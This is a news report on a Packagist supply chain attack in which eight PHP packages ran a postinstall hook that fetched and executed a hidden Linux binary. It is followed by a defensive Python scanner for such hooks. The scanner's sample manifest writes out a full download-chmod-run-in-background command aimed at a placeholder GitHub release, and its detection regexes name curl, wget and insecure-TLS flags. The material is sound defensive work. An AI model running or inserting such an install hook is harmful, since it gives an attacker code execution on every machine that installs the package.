Packagist attack adds Linux malware via package.json
Eight Packagist PHP packages contained package.json postinstall scripts that downloaded a Linux binary from a GitHub Releases URL, saved it to /tmp/.sshd, made it executable and ran it.
Security researchers reported a coordinated supply chain attack that affected eight packages on Packagist. The packages contained package.json postinstall scripts that downloaded a Linux binary from a GitHub Releases URL, saved it to /tmp/.sshd, changed its permissions to make it executable and launched it in the background. The malicious package versions have been removed from Packagist.
Application security firm Socket examined the campaign and found the malicious code was bundled inside the package artifacts rather than in composer.json, the metadata file Composer itself reads. Composer does not execute package.json lifecycle scripts, so the actor placed a Node postinstall hook in package.json, where it fires whenever a JavaScript package manager such as npm processes that file in an environment that runs JavaScript build tooling alongside the PHP code.
The affected packages and versions include moritz-sauer-13/silverstripe-cms-theme (dev-master), crosiersource/crosierlib-base (dev-master), devdojo/wave (dev-main), devdojo/genesis (dev-main), katanaui/katana (dev-main), elitedevsquad/sidecar-laravel (3.x-dev), r2luna/brain (dev-main) and baskarcm/tzi-chat-ui (dev-main).
Socket’s analysis shows the postinstall script attempted to download a second-stage binary from github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f, save it to /tmp/.sshd, run chmod to grant execute permissions for all users and start the file in the background. The installer also disabled TLS verification and suppressed error output. The downloaded component carried the label “gvfsd-network,” a name that references the GNOME Virtual File System daemon; the GitHub account that hosted the release is no longer available, so the exact behavior of the binary could not be determined.
Investigators found references to the same payload across roughly 777 files on GitHub. In some repositories the malicious code appeared in GitHub workflow files, where it could execute during GitHub Actions jobs. It is not clear how many of the references reflect distinct compromises, forks, duplicate artifacts or cached copies.
Socket warned: “Even without the second-stage binary, the malicious installer is enough to warrant blocking.” The firm also noted the installer provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors and running a downloaded binary in the background.
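The installer behaviour reported above (remote fetch with TLS checks off, a dotfile dropped under /tmp, chmod, backgrounded execution with errors silenced) is easy to gate on before the hook ever runs. The following scanner is an added example, not Socket's tooling or anything from the affected packages: it walks a checkout for package.json files, scans the npm lifecycle hooks for those indicators and returns a block/review/clear verdict, which is the kind of check Socket's "enough to warrant blocking" advice calls for. The indicator regexes, thresholds, hook list and the two sample manifests (including the placeholder GitHub URL) are constructed for illustration.

```python
"""
Heuristic scanner for package.json lifecycle hooks that resemble the reported
installer: fetch over HTTP(S) with TLS verification off, drop a dotfile under
/tmp, chmod it, run it in the background with errors suppressed.
Added example; indicator regexes, thresholds and sample manifests are constructed.
"""
import json
import re
from pathlib import Path

# npm/yarn/pnpm hooks that run automatically during install (assumed list).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Behaviours reported for the campaign, each as a loose regex over the shell
# command string. Heuristic: one hit means little, the combination matters.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b"),
    # curl -k / -sk, curl --insecure, wget --no-check-certificate
    "tls_verification_disabled": re.compile(
        r"(?:(?<=\s)-[A-Za-z]*k[A-Za-z]*\b|--insecure|--no-check-certificate)"),
    "writes_to_tmp": re.compile(r"/tmp/"),
    "hidden_dotfile": re.compile(r"/\.[A-Za-z0-9_-]+"),
    "chmod_executable": re.compile(r"\bchmod\s+(?:[ugoa]*\+[rw]*x|[0-7]{3,4})\b"),
    "error_output_suppressed": re.compile(r"2>\s*/dev/null|>\s*/dev/null\s+2>&1"),
    # a lone '&' (not '&&') or a detach helper
    "backgrounded": re.compile(r"(?<=\s)&(?!&)|\b(?:nohup|setsid|disown)\b"),
    "github_release_asset": re.compile(r"github\.com/[^/\s]+/[^/\s]+/releases/download/"),
}


def scan_command(command: str) -> list[str]:
    """Return the names of every indicator that matches a shell command string."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def verdict(indicators: list[str]) -> str:
    """Collapse indicator hits into an action for a dependency gate."""
    hits = set(indicators)
    # A download plus anything that makes it runnable is the core pattern.
    if "remote_fetch" in hits and hits & {"chmod_executable", "writes_to_tmp", "backgrounded"}:
        return "block"
    if len(hits) >= 2:
        return "review"
    return "clear"


def scan_manifest(text: str, source: str = "package.json") -> list[dict]:
    """Scan the lifecycle hooks in one package.json document."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (json.JSONDecodeError, AttributeError):
        return [{"source": source, "hook": None, "command": None,
                 "indicators": [], "verdict": "unparseable"}]
    if not isinstance(scripts, dict):
        scripts = {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        hits = scan_command(command)
        findings.append({"source": source, "hook": hook, "command": command,
                         "indicators": hits, "verdict": verdict(hits)})
    return findings


def scan_tree(root: Path) -> list[dict]:
    """Walk a checkout, including vendor/ and node_modules/, for package.json files."""
    findings = []
    for path in root.rglob("package.json"):
        text = path.read_text(encoding="utf-8", errors="replace")
        findings.extend(scan_manifest(text, str(path)))
    return findings


# Constructed sample manifests. The URL, filename and flags imitate the reported
# pattern only; they are not the real payload location.
MALICIOUS_MANIFEST = json.dumps({
    "name": "example-php-package",
    "scripts": {
        "postinstall": (
            "curl -sk -L https://github.com/example-org/example-repo/releases/download/v1/helper "
            "-o /tmp/.sshd 2>/dev/null; chmod 755 /tmp/.sshd; /tmp/.sshd >/dev/null 2>&1 &"
        )
    },
})

BENIGN_MANIFEST = json.dumps({
    "name": "example-theme",
    "scripts": {"postinstall": "node scripts/build.js", "test": "jest"},
})


if __name__ == "__main__":
    for manifest in (MALICIOUS_MANIFEST, BENIGN_MANIFEST):
        for f in scan_manifest(manifest):
            print(f["verdict"], f["hook"], ",".join(f["indicators"]) or "-", f["command"])
```

Run it as `python scan.py` against the embedded samples, or call `scan_tree(Path("."))` from a CI step and fail the job on any "block" verdict. `scan_command` works on any shell string, so the same indicators can be applied to `run:` steps pulled out of GitHub workflow files, where Socket also found the payload. The blunt control that needs no scanner is to stop lifecycle hooks running at all in build environments: `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) and `composer install --no-scripts`, re-enabling scripts only for packages you have reviewed.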